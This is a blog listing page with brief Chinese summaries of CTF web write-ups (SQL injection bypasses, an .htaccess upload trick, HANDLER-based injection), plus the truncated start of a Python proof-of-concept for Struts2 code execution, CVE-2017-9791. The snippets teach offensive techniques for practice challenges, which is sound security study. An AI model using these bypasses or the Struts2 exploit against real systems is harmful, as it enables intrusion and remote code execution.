![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
web
1
hercu1iz
i am a robot.
展开
-
[网鼎杯 2018]Fakebook
1,网页访问内容2,join功能自动跳转:查看源码:这里使用了伪协议获取数据。收集信息:可通过伪协议读数据2,观察url特征,尝试sqli出现报错,大概率存在sqli,但感觉得绕过,先做个目录扫描多收集点信息。收集信息:web目录路径3,robots.txt文件发现信息直接可以把user.php.bak下载下来,内容如下:直接审计一波。原创 2023-04-15 21:55:29 · 363 阅读 · 1 评论 -
[CISCN2019 华北赛区 Day2 Web1]Hack World
思考:这里如果对访问次数加以限制就很难爆破盲注突破了。2,burp测试黑名单关键字。思路:大概率得盲注了。原创 2023-04-08 21:47:30 · 174 阅读 · 0 评论 -
[GYCTF2020]Blacklist
发现flag列,推测其应为flag,尝试获取内容,但是因为select被限制,查了一些资料了解HANDLER语法可以绕过select限制。没有限制关键字show,通过堆叠注入查看库名。2,利用Burp测试过滤关键字。handler句柄使用知识点。原创 2023-04-05 11:44:34 · 42 阅读 · 0 评论 -
[GXYCTF2019]BabyUpload
注意:这里的.htaccess就是文件名,绕过更改文件类似在burp中更改绕过,不要写成.htaccess.jpg文件名,它不会被识别未配置文件。->两者都做了检测,尝试绕过->上传成功无法被解析->考虑解析漏洞,上传配置文件->解析成功。3,怀疑对php标签内容检测,如?思路:考虑.htaccess和.user.ini配置文件控制,实现解析漏洞。分析:文件上传成功了,但是jpg文件无法被当成php解析。分析:验证了对文件名后缀检测,同时可能存在对内容检测。2,尝试上传其它类型的文件。原创 2023-04-05 09:07:48 · 624 阅读 · 0 评论 -
struts2 代码执行 (CVE-2017-9791)
struts2 代码执行 (CVE-2017-9791)#!/usr/bin/python# -*- coding: utf-8 -*-import json,reimport requestsimport threadingimport urllibdef Poc(url,command): header = {'Content-Type': 'application/x-www-form-urlencoded'} poc = {"name":"%{(#szgx='mu原创 2021-08-31 12:20:24 · 353 阅读 · 0 评论 -
[GXYCTF2019]BabySQli
源码显示过滤了() or = 四个字符,同时需要查询到的数据数组第二位是admin,password使用md5加密后与查询到的第三位相等即可输出flag,于是可以通过mysql数据库会自动构建返回虚拟数据进行绕过。知识点:绕过主要利用了mysql自动构建虚拟数据返回的原理。3,用bp爆破测试一下被绕过的关键字。4,手动绕过,直接找源码看绕过点吧。1、可以使用sqlmap自动跑。原创 2023-04-03 22:09:52 · 105 阅读 · 0 评论